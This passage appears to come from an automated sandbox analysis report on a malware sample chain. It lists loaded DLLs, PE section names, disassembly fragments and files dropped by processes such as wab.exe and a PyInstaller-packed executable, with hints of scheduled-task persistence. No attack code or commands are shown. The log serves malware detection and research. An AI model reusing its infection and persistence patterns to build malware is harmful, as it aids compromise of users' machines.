            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netutils.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: samcli.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: pywintypes312.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msimg32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: version.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: python3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libffi-8.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: propsys.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140_1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libssl-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tcl86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tk86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netapi32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: userenv.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: zlib1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: logoncli.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netutils.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: samcli.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: pywintypes312.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msimg32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: version.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: python3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libffi-8.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: propsys.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140_1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libssl-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tcl86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tk86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netapi32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: userenv.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: zlib1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: logoncli.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netutils.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: samcli.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: pywintypes312.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msimg32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: ehlomwhndtxtghmocdrs.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\service123.exeSection loaded: ehlomwhndtxtghmocdrs.dll
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeWindow detected: Number of UI elements: 12
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exeStatic file information: File size 5022848 > 1048576
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805096282.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdb source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.0000000003736000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1961213361.00000000035AE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1804506801.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1804506801.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.0000000003736000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1961213361.00000000035AE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805096282.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: VCRUNTIME140_1.dll.13.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: Channel2[1].exe.4.drStatic PE information: section name: /4
            Source: Channel2[1].exe.4.drStatic PE information: section name: /14
            Source: Channel2[1].exe.4.drStatic PE information: section name: /29
            Source: Channel2[1].exe.4.drStatic PE information: section name: /41
            Source: Channel2[1].exe.4.drStatic PE information: section name: /55
            Source: Channel2[1].exe.4.drStatic PE information: section name: /67
            Source: Channel2[1].exe.4.drStatic PE information: section name: /80
            Source: Channel2[1].exe.4.drStatic PE information: section name: /91
            Source: Channel2[1].exe.4.drStatic PE information: section name: /102
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /4
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /14
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /29
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /41
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /55
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /67
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /80
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /91
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.4.drStatic PE information: section name: /102
            Source: CheckTool[1].exe.4.drStatic PE information: section name: .symtab
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe.4.drStatic PE information: section name: .symtab
            Source: zlib1.dll.13.drStatic PE information: section name: .xdata
            Source: VCRUNTIME140.dll.13.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.13.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.13.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.13.drStatic PE information: section name: .00cfg
            Source: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll.13.drStatic PE information: section name: .xdata
            Source: msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll.13.drStatic PE information: section name: .didat
            Source: python312.dll.13.drStatic PE information: section name: PyRuntim
            Source: service123.exe.15.drStatic PE information: section name: .eh_fram
            Source: ehlOmWhNDTxTGhmOcdRs.dll.15.drStatic PE information: section name: .eh_fram
            Source: zlib1.dll.21.drStatic PE information: section name: .xdata
            Source: VCRUNTIME140.dll.21.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.21.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.21.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.21.drStatic PE information: section name: .00cfg
            Source: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll.21.drStatic PE information: section name: .xdata
            Source: msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll.21.drStatic PE information: section name: .didat
            Source: python312.dll.21.drStatic PE information: section name: PyRuntim
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF27C2E pushad ; retf 0_2_00007FFB4AF27C5D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF27C5E push eax; retf 0_2_00007FFB4AF27C6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AF27B80 push eax; retf 0_2_00007FFB4AF27C6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFB4AFF0001 push esp; retf 4810h0_2_00007FFB4AFF0312
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_00447D11 push ss; ret 19_2_00447D12
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8557983 push 6FFDC5CAh; ret 20_2_00007FFBA8557989
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA85579CF push 6FFDC5C3h; iretd 20_2_00007FFBA85579D5
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8554AEE push 6FFDC5D5h; iretd 20_2_00007FFBA8554AF4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8557425 push 60F5C5F1h; iretd 20_2_00007FFBA855742D
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8554640 push 60F5C5F1h; iretd 20_2_00007FFBA8554648
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA85576D3 push 6FFDC5D5h; iretd 20_2_00007FFBA85576D9
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8554FEA push 6FFDC5C3h; iretd 20_2_00007FFBA8554FF0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FFBA8554F9E push 6FFDC5CAh; ret 20_2_00007FFBA8554FA4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E4640 push 60F5C5F1h; iretd 23_2_00007FFBA59E4648
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E7425 push 60F5C5F1h; iretd 23_2_00007FFBA59E742D
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E79CF push 6FFDC5C3h; iretd 23_2_00007FFBA59E79D5
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E4F9E push 6FFDC5CAh; ret 23_2_00007FFBA59E4FA4
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E4FEA push 6FFDC5C3h; iretd 23_2_00007FFBA59E4FF0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E7983 push 6FFDC5CAh; ret 23_2_00007FFBA59E7989
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E76D3 push 6FFDC5D5h; iretd 23_2_00007FFBA59E76D9
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA59E4AEE push 6FFDC5D5h; iretd 23_2_00007FFBA59E4AF4

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\tcl86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\zlib1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_wmi.pydJump to dropped file
